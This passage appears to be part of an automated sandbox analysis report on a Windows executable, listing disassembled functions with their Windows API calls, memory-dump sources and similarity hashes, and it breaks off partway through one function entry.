              • Instruction Fuzzy Hash: 2A312C71900218AFDB14EFA5C985AEFB7F9EF98300F14406AE416E7241EB759E05CFA0
              Function 0020C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • GetCursorPos.USER32(?), ref: 0020C7C2
              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001BBBFB,?,?,?,?,?), ref: 0020C7D7
              • GetCursorPos.USER32(?), ref: 0020C824
              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,001BBBFB,?,?,?), ref: 0020C85E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Cursor$LongMenuPopupProcTrackWindow
              • String ID:
              • API String ID: 2864067406-0
              • Opcode ID: 3a42d11366ce8205a0df6250544c40899d57a5f335016a9682d543e22ffb58f0
              • Instruction ID: 9c33a20f3ed61109ce3694ab1fd7d0e49ce0621916642065a4ef1ceadd3755df
              • Opcode Fuzzy Hash: 3a42d11366ce8205a0df6250544c40899d57a5f335016a9682d543e22ffb58f0
              • Instruction Fuzzy Hash: 2B31F875510218AFCB26CF58DC9CEEA7BB9EF0A310F144165F9058B2A2D7315D60DF64
              Function 001D8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001D8669
                • Part of subcall function 001D8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001D8673
                • Part of subcall function 001D8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001D8682
                • Part of subcall function 001D8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001D8689
                • Part of subcall function 001D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001D869F
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001D8BEB
              • _memcmp.LIBCMT ref: 001D8C0E
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001D8C44
              • HeapFree.KERNEL32(00000000), ref: 001D8C4B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
              • String ID:
              • API String ID: 1592001646-0
              • Opcode ID: 87f4dac28c3455d34f6da9f8840f2bfd6cd2a3ff9a4de9228fa097aacb556f11
              • Instruction ID: e1c3093b674b25d1b05551b55934a5b4fab139b40559c0ef6eb307b1a69a07d2
              • Opcode Fuzzy Hash: 87f4dac28c3455d34f6da9f8840f2bfd6cd2a3ff9a4de9228fa097aacb556f11
              • Instruction Fuzzy Hash: 01219D71E51208EFDB10DFA4C949BEEB7B8EF44354F14409AE458A7341EB31AE06CB60
              Function 001A0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
              Download Yara Rule
              APIs
              • __setmode.LIBCMT ref: 001A0BF2
                • Part of subcall function 00185B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,001E7B20,?,?,00000000), ref: 00185B8C
                • Part of subcall function 00185B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,001E7B20,?,?,00000000,?,?), ref: 00185BB0
              • _fprintf.LIBCMT ref: 001A0C29
              • OutputDebugStringW.KERNEL32(?), ref: 001D6331
                • Part of subcall function 001A4CDA: _flsall.LIBCMT ref: 001A4CF3
              • __setmode.LIBCMT ref: 001A0C5E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
              • String ID:
              • API String ID: 521402451-0
              • Opcode ID: 6e7013f36cd9f760011cbfe07b6847f12de38a2c99a1f495f6b7d31aaadeaff8
              • Instruction ID: cc8d5429a50a686b64a47bd47e91a0e499ed60ea4aad8cd71bb6e911543784f3
              • Opcode Fuzzy Hash: 6e7013f36cd9f760011cbfe07b6847f12de38a2c99a1f495f6b7d31aaadeaff8
              • Instruction Fuzzy Hash: 70115C399042047FCB09B7B4AC479BE7B69DFA7320F14015AF204571C2DFA15D568791
              Function 001F1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
              Download Yara Rule
              APIs
              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001F1A97
                • Part of subcall function 001F1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001F1B40
                • Part of subcall function 001F1B21: InternetCloseHandle.WININET(00000000), ref: 001F1BDD
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Internet$CloseConnectHandleOpen
              • String ID:
              • API String ID: 1463438336-0
              • Opcode ID: ba7bce5afd91b210a4a1bb65345d1656757fce9b061744d1025e7055708ab5c5
              • Instruction ID: a7d291d5c286f5529b0b440a3344cb0cec0be5e25d718ad0368f92b84baa6901
              • Opcode Fuzzy Hash: ba7bce5afd91b210a4a1bb65345d1656757fce9b061744d1025e7055708ab5c5
              • Instruction Fuzzy Hash: D221CF31240708FFDB269F608C04FBAB7B9FF94700F10001AFB0696661EB7198119BA1
              Function 001DE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001DF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,001DE1C4,?,?,?,001DEFB7,00000000,000000EF,00000119,?,?), ref: 001DF5BC
                • Part of subcall function 001DF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 001DF5E2
                • Part of subcall function 001DF5AD: lstrcmpiW.KERNEL32(00000000,?,001DE1C4,?,?,?,001DEFB7,00000000,000000EF,00000119,?,?), ref: 001DF613
              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,001DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 001DE1DD
              • lstrcpyW.KERNEL32(00000000,?), ref: 001DE203
              • lstrcmpiW.KERNEL32(00000002,cdecl,?,001DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 001DE237
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: lstrcmpilstrcpylstrlen
              • String ID: cdecl
              • API String ID: 4031866154-3896280584
              • Opcode ID: 72de4d2d63c87b9b8b02553cc02fabb383e9b8c5b75074af29d66a1f4cf7803f
              • Instruction ID: 4c5771f83e1a7f6a0e1abda2db45735f32fdc652a6d2b28f28d3703817709c33
              • Opcode Fuzzy Hash: 72de4d2d63c87b9b8b02553cc02fabb383e9b8c5b75074af29d66a1f4cf7803f
              • Instruction Fuzzy Hash: 35115E3A200345EFCB25AF64EC4997A77B9FF99350B40412BF816CB260EB71A951D7A0
              Function 001B5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 001B5351
                • Part of subcall function 001A594C: __FF_MSGBANNER.LIBCMT ref: 001A5963
                • Part of subcall function 001A594C: __NMSG_WRITE.LIBCMT ref: 001A596A
                • Part of subcall function 001A594C: RtlAllocateHeap.NTDLL(01410000,00000000,00000001,00000000,?,?,?,001A1013,?), ref: 001A598F
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AllocateHeap_free
              • String ID:
              • API String ID: 614378929-0
              • Opcode ID: d4824805c9afc3c5c23c9351e8b08a4a0c92830deff4d1d6e0ca1b5d9de01970
              • Instruction ID: f8d1b1bdd39288f35c81417a7b20b123d3b4a0c53cc72dd34d708bb19757e153
              • Opcode Fuzzy Hash: d4824805c9afc3c5c23c9351e8b08a4a0c92830deff4d1d6e0ca1b5d9de01970
              • Instruction Fuzzy Hash: 2A11E736904B15AFCB353F74BC0579D37D67F263B0B204429F9049A2B1DFB589408750
              Function 00184531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 00184560
                • Part of subcall function 0018410D: _memset.LIBCMT ref: 0018418D
                • Part of subcall function 0018410D: _wcscpy.LIBCMT ref: 001841E1
                • Part of subcall function 0018410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001841F1
              • KillTimer.USER32(?,00000001,?,?), ref: 001845B5
              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001845C4
              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001BD6CE
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
              • String ID:
              • API String ID: 1378193009-0
              • Opcode ID: a5b8a7ff904092d42cd90a909a6917890660ca55a3cc5ead33951b567bd617dd
              • Instruction ID: 9095f0f14c9c3b530eb15d19f53c39be80dcd8edc39967c6c7d77e01d09bcb94
              • Opcode Fuzzy Hash: a5b8a7ff904092d42cd90a909a6917890660ca55a3cc5ead33951b567bd617dd
              • Instruction Fuzzy Hash: C621F970904784AFEB369B24EC49BEBBBEC9F11304F04009EE69E96241D7B45A84CF52
              Function 001E40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 001E40D1
              • _memset.LIBCMT ref: 001E40F2
              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001E4144
              • CloseHandle.KERNEL32(00000000), ref: 001E414D
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CloseControlCreateDeviceFileHandle_memset
              • String ID:
              • API String ID: 1157408455-0
              • Opcode ID: c9426ca5fa21f1b9d3307530f4289fae86b7d225749141882266ff04193614a7
              • Instruction ID: 1eeb2fb494c5b22fb19550ee50da4be2472c903b5aff4ab75196209530338334
              • Opcode Fuzzy Hash: c9426ca5fa21f1b9d3307530f4289fae86b7d225749141882266ff04193614a7
              • Instruction Fuzzy Hash: D311A7759413287AD7309BA5AC4DFEFBB7CEF45760F1041AAF908D7180D6744E808BA4
              Function 001F667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00185B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,001E7B20,?,?,00000000), ref: 00185B8C
                • Part of subcall function 00185B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,001E7B20,?,?,00000000,?,?), ref: 00185BB0
              • gethostbyname.WSOCK32(?,?,?), ref: 001F66AC
              • WSAGetLastError.WSOCK32(00000000), ref: 001F66B7
              • _memmove.LIBCMT ref: 001F66E4
              • inet_ntoa.WSOCK32(?), ref: 001F66EF
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
              • String ID:
              • API String ID: 1504782959-0
              • Opcode ID: 152f64d66a78dc8b40d0ce31d76b4a0820313d952b576b3c491fdf1b50f72f3d
              • Instruction ID: da7b46740b4285db601704478dc94e3ce4e8fec735bdd929a3db099bf9328062
              • Opcode Fuzzy Hash: 152f64d66a78dc8b40d0ce31d76b4a0820313d952b576b3c491fdf1b50f72f3d
              • Instruction Fuzzy Hash: D9112E35500509AFCB04FBA4DD96DEEB7B9EF64310B144165F506A7162DF30AF14CB61
              Function 001D9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,000000B0,?,?), ref: 001D9043
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D9055
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D906B
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D9086
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: 12de1de81909ccae8ef746ecbe51ef562fefc20b2b10c424697ce5e379698fcc
              • Instruction ID: ff3ad08746ce609c2bfd2750d5389adb4d40930269616420203473d5e8ce822f
              • Opcode Fuzzy Hash: 12de1de81909ccae8ef746ecbe51ef562fefc20b2b10c424697ce5e379698fcc
              • Instruction Fuzzy Hash: B9114C79940218FFDB10DFA5C984E9DBB78FB48310F204196F904B7250D7726E11DB90
              Function 00181290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • DefDlgProcW.USER32(?,00000020,?), ref: 001812D8
              • GetClientRect.USER32(?,?), ref: 001BB84B
              • GetCursorPos.USER32(?), ref: 001BB855
              • ScreenToClient.USER32(?,?), ref: 001BB860
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Client$CursorLongProcRectScreenWindow
              • String ID:
              • API String ID: 4127811313-0
              • Opcode ID: d3aed986910b168afea0ea635d7830109533e346305b7274fb74c014ccdd56e0
              • Instruction ID: 7e6eb35f2688699b17b85142f420fc8d4c9032c88c5259896a789e37a010d545
              • Opcode Fuzzy Hash: d3aed986910b168afea0ea635d7830109533e346305b7274fb74c014ccdd56e0
              • Instruction Fuzzy Hash: 38116A36900119BFCB10EF94E8899EE77BDEB05300F600456F911E3151C730BA528FA5
              Function 001E1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
              Download Yara Rule
              APIs
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001E01FD,?,001E1250,?,00008000), ref: 001E166F
              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,001E01FD,?,001E1250,?,00008000), ref: 001E1694
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001E01FD,?,001E1250,?,00008000), ref: 001E169E
              • Sleep.KERNEL32(?,?,?,?,?,?,?,001E01FD,?,001E1250,?,00008000), ref: 001E16D1
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CounterPerformanceQuerySleep
              • String ID:
              • API String ID: 2875609808-0
              • Opcode ID: c1586fa238783de2773a576b8540536f640dc3aa3f138a04e7df12d44f070781
              • Instruction ID: 7244af8f786d3d1f6578c703a33db3006f65d27c6a8f0640628543a67f2d4ce6
              • Opcode Fuzzy Hash: c1586fa238783de2773a576b8540536f640dc3aa3f138a04e7df12d44f070781
              • Instruction Fuzzy Hash: 1D117C31C00A1CE7CF00AFA6E948AEEBB78FF0D701F454059E944B6240CB7055A08BD6
              Function 001B7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
              • Instruction ID: 87cef8579b917a8c811e3d925717f838b62fe329029b2773ee097cfa9ae19e26
              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
              • Instruction Fuzzy Hash: 34018C3204818ABBCF125E84CC018EE3F22BFA9354F098695FA1868071C337C9B1AB81
              Function 0020B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • GetWindowRect.USER32(?,?), ref: 0020B59E
              • ScreenToClient.USER32(?,?), ref: 0020B5B6
              • ScreenToClient.USER32(?,?), ref: 0020B5DA
              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0020B5F5
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClientRectScreen$InvalidateWindow
              • String ID:
              • API String ID: 357397906-0
              • Opcode ID: eac0af2291b5e14c855f488ec6cc1af9d6510c66074f1d2a3e2acb487f0e6e58
              • Instruction ID: 4e1cf64223aefc161bdcd48df1568f2d313346e2460ff693fadd9ac786c47f16
              • Opcode Fuzzy Hash: eac0af2291b5e14c855f488ec6cc1af9d6510c66074f1d2a3e2acb487f0e6e58
              • Instruction Fuzzy Hash: C71166B5D0020AEFDB51CF99D9449EEFBB9FB08310F104166E914E3621D731AA618F50
              Function 0020B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 0020B8FE
              • _memset.LIBCMT ref: 0020B90D
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00247F20,00247F64), ref: 0020B93C
              • CloseHandle.KERNEL32 ref: 0020B94E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memset$CloseCreateHandleProcess
              • String ID:
              • API String ID: 3277943733-0
              • Opcode ID: 25c1114a53cfeb8c0df69264d255a2e443e8ca728ec7c3e36ebc098fdd1af9f3
              • Instruction ID: 41af4192a3787ed861911bc6784a0b1b479a5c6798c2a73e7bc749ba1873c945
              • Opcode Fuzzy Hash: 25c1114a53cfeb8c0df69264d255a2e443e8ca728ec7c3e36ebc098fdd1af9f3
              • Instruction Fuzzy Hash: 74F082B65943047BF3202B61BC09FBB7A5CEB1A754F010470BF18D9692E7724D1487E8
              Function 001E6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
              Download Yara Rule
              APIs
              • EnterCriticalSection.KERNEL32(?), ref: 001E6E88
                • Part of subcall function 001E794E: _memset.LIBCMT ref: 001E7983
              • _memmove.LIBCMT ref: 001E6EAB
              • _memset.LIBCMT ref: 001E6EB8
              • LeaveCriticalSection.KERNEL32(?), ref: 001E6EC8
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CriticalSection_memset$EnterLeave_memmove
              • String ID:
              • API String ID: 48991266-0
              • Opcode ID: bb753df18b2f9428252ae2b71119b3c9a6fb799621b9046dfe7244565025d44d
              • Instruction ID: bc9b6af2af0b618863bbef5425a016cb3880a747954f397d39df221c48a32955
